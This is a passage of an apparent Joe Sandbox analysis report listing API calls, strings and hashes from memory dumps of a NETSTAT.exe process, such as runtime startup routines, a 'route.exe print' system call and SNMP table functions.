                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00685AC5
                                                                                                                                                                            • exit.MSVCRT ref: 00685B0C
                                                                                                                                                                            • _XcptFilter.MSVCRT ref: 00685B1E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 796493780-0
                                                                                                                                                                            • Opcode ID: acf1e74bc60145503d4b2dd364430134065c9d2dbca7f036d386d0b22f6aeb3c
                                                                                                                                                                            • Instruction ID: ab413974d12bace495468bacdb8c8bdc683def90fab002130b42334b6d32928b
                                                                                                                                                                            • Opcode Fuzzy Hash: acf1e74bc60145503d4b2dd364430134065c9d2dbca7f036d386d0b22f6aeb3c
                                                                                                                                                                            • Instruction Fuzzy Hash: A5318E71648A15AFDB29FB64EC89A6977A7E704720F20136DE403973A0DB708C418B54
                                                                                                                                                                            APIs
                                                                                                                                                                            • _fileno.MSVCRT ref: 0068453B
                                                                                                                                                                            • _get_osfhandle.MSVCRT ref: 00684542
                                                                                                                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000), ref: 00684558
                                                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00684564
                                                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0068456E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$FileType_fileno_get_osfhandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3475475711-0
                                                                                                                                                                            • Opcode ID: 91226a5e166cc5f66a2644f1882d7376851e99832fe57eaa7c306b3eebde5e57
                                                                                                                                                                            • Instruction ID: fe392d2c84373f9fad84d663c83b4d4bab1912720802856d59285adf591c2f8a
                                                                                                                                                                            • Opcode Fuzzy Hash: 91226a5e166cc5f66a2644f1882d7376851e99832fe57eaa7c306b3eebde5e57
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C016273A14212BF9730EBB5AC4C9AF36ABDA857717514725E652D3290EE20CC018773
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                            • Instruction ID: 498523e31b439c42a4af9dc524980c1a251bb793d932049338c95eecaaac4323
                                                                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                            • Instruction Fuzzy Hash: 03819074E092499BDF28EF68C8517BEBBA5AF4D310F2CC559D861A73D0C73498418F58
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                                                            • Opcode ID: 96aefe3a6ef47411f417578e634af182caca25c2d0424a84797a08fc0aa7be7f
                                                                                                                                                                            • Instruction ID: af34c895ee6d73dfb88fea75af4fb40e4550e5fea98b21a462b32efb4aa479cf
                                                                                                                                                                            • Opcode Fuzzy Hash: 96aefe3a6ef47411f417578e634af182caca25c2d0424a84797a08fc0aa7be7f
                                                                                                                                                                            • Instruction Fuzzy Hash: 9921537AA00219AFDB10EF69D840AEEB7E8AF4D640F480516EA15D7200E730D9028BA5
                                                                                                                                                                            APIs
                                                                                                                                                                            • memset.MSVCRT ref: 00682835
                                                                                                                                                                            • GetSystemDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000105), ref: 00682853
                                                                                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0068285D
                                                                                                                                                                            • _wsystem.MSVCRT ref: 00682885
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryErrorLastSystem_wsystemmemset
                                                                                                                                                                            • String ID: \route.exe" print
                                                                                                                                                                            • API String ID: 786266830-1087285068
                                                                                                                                                                            • Opcode ID: af7b0c14129c9d56bffc97d4cfb5e058982f607ebe6504205a5179db5725295d
                                                                                                                                                                            • Instruction ID: 048eddc36ea7918e9809d0cdfc917bcdfbf0f5b0064ac37dc6a579d2d07580c0
                                                                                                                                                                            • Opcode Fuzzy Hash: af7b0c14129c9d56bffc97d4cfb5e058982f607ebe6504205a5179db5725295d
                                                                                                                                                                            • Instruction Fuzzy Hash: E4018670A40309FBDB10FB64DD5EB9A777A9F08700F5011A9A649E7281EB74AA49CB41
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031B02E7
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 031B031E
                                                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031B02BD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                                                            • Opcode ID: 819b032d1d10738ea1c5ffbfc6bf1bfeae76084cc277fd2aca1e8db04948ad72
                                                                                                                                                                            • Instruction ID: b64c2ec86107e7e6a04ef7b59cd354e6795f9293ba678b9c89d2d00d5f920ca1
                                                                                                                                                                            • Opcode Fuzzy Hash: 819b032d1d10738ea1c5ffbfc6bf1bfeae76084cc277fd2aca1e8db04948ad72
                                                                                                                                                                            • Instruction Fuzzy Hash: 5EE1DD306087419FD724CF68D884B6AB7E4BF8C314F184AADF4A58B2E0D774D896CB42
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 031B7BAC
                                                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 031B7B7F
                                                                                                                                                                            • RTL: Resource at %p, xrefs: 031B7B8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                                                            • Opcode ID: ae4078a57ea5d10f084ac9e656b65ab14a73971a40a0ba7fc14022da11511c7b
                                                                                                                                                                            • Instruction ID: 8c7cbe48e767157290d263e13919961ba69dc11f00068605750b171a6ca55970
                                                                                                                                                                            • Opcode Fuzzy Hash: ae4078a57ea5d10f084ac9e656b65ab14a73971a40a0ba7fc14022da11511c7b
                                                                                                                                                                            • Instruction Fuzzy Hash: FF41DE353097029FC724DE25C940B6AB7F5EF8DB10F184A2DF85ADB680DB31E9468B91
                                                                                                                                                                            APIs
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031B728C
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 031B7294
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 031B72C1
                                                                                                                                                                            • RTL: Resource at %p, xrefs: 031B72A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                                                            • Opcode ID: 79486665517281a0931cba412df791ba9980db31349301bfe4cfb42cf3b48465
                                                                                                                                                                            • Instruction ID: 096f1afde93064aacdbf719e4608588110bcd15062e8339e0cbb5a96a9b0a198
                                                                                                                                                                            • Opcode Fuzzy Hash: 79486665517281a0931cba412df791ba9980db31349301bfe4cfb42cf3b48465
                                                                                                                                                                            • Instruction Fuzzy Hash: 1341FF35604346AFC720DE25CC41BAAB7B5FF9C710F184A59F996AB280DB31E8528BD0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                                            • Opcode ID: ab190458f15fdd29668a23e9374279edfe2e705ef194b44bf2fcaef90eaa7f3d
                                                                                                                                                                            • Instruction ID: 8efc801b82d90b1519514321f694fae507c9e1f71b7412c5bb9ecd4119614392
                                                                                                                                                                            • Opcode Fuzzy Hash: ab190458f15fdd29668a23e9374279edfe2e705ef194b44bf2fcaef90eaa7f3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 13317A7AA006199FDB20DF29DC40BEEB7F8EF4C610F444996E949D7140EB30DA458F60
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 006848A5: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000000,00000000,?,00000000,00000000,?,?,?,006843B7,0000275D,00000000,00000000,?), ref: 006848CA
                                                                                                                                                                              • Part of subcall function 006837EC: htons.WS2_32(?), ref: 0068381C
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,00000001,?,?,00000000,0000274F,?), ref: 00683DF9
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000001,?,?,00000000,0000274F,?), ref: 00683E59
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00683E60
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeLocal$FormatMessagehtons
                                                                                                                                                                            • String ID: o$h
                                                                                                                                                                            • API String ID: 523628632-239820227
                                                                                                                                                                            • Opcode ID: 3b3f33309f9d3d32415f07bc562ea809bfbc1c01426cd73f419bde66124ce319
                                                                                                                                                                            • Instruction ID: d705652040f0e9f91a96cda408ded50309ca308d9ace8ead17456e2f2ebc315b
                                                                                                                                                                            • Opcode Fuzzy Hash: 3b3f33309f9d3d32415f07bc562ea809bfbc1c01426cd73f419bde66124ce319
                                                                                                                                                                            • Instruction Fuzzy Hash: FA81A772D44239AFEB61BB14CC4AFAAB37ADB04B00F100299F50DB6381DA75AF45DB51
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00685E48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00685E4F
                                                                                                                                                                            • __set_app_type.MSVCRT ref: 00685962
                                                                                                                                                                            • __p__fmode.MSVCRT ref: 00685978
                                                                                                                                                                            • __p__commode.MSVCRT ref: 00685986
                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 006859A7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                            • Opcode ID: 8c6d1ac72756bc21d794c263346fbcb8fbe0e4d21b28f8c6496d783b40dbbb68
                                                                                                                                                                            • Instruction ID: 018b0a4c0dcd71aa68d3e62b6dc0f75e25f464e56df66345fa4999f0d7f1e29a
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c6d1ac72756bc21d794c263346fbcb8fbe0e4d21b28f8c6496d783b40dbbb68
                                                                                                                                                                            • Instruction Fuzzy Hash: 96F0F271448B05AFE768BF30EC4E6083B73AB05321BA06B5DE462832F1DF7AC5818B14
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                             • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                                                            • String ID: +$-
                                                                                                                                                                            • API String ID: 1302938615-2137968064
Strings
Memory Dump Source
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
APIs
  • Part of subcall function 00686139: __iob_func.MSVCRT ref: 0068613E
• fprintf.MSVCRT ref: 00684A94
• SnmpUtilMemAlloc.SNMPAPI(00000168,?,00000000,000000FF,00000000,?,00681F9B,?,00000000,000000FF), ref: 00684AE1
Strings
Memory Dump Source
• Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
Similarity
• API ID: AllocSnmpUtil__iob_funcfprintf
• String ID: GetTable: type = %d
• API String ID: 2435445832-851864366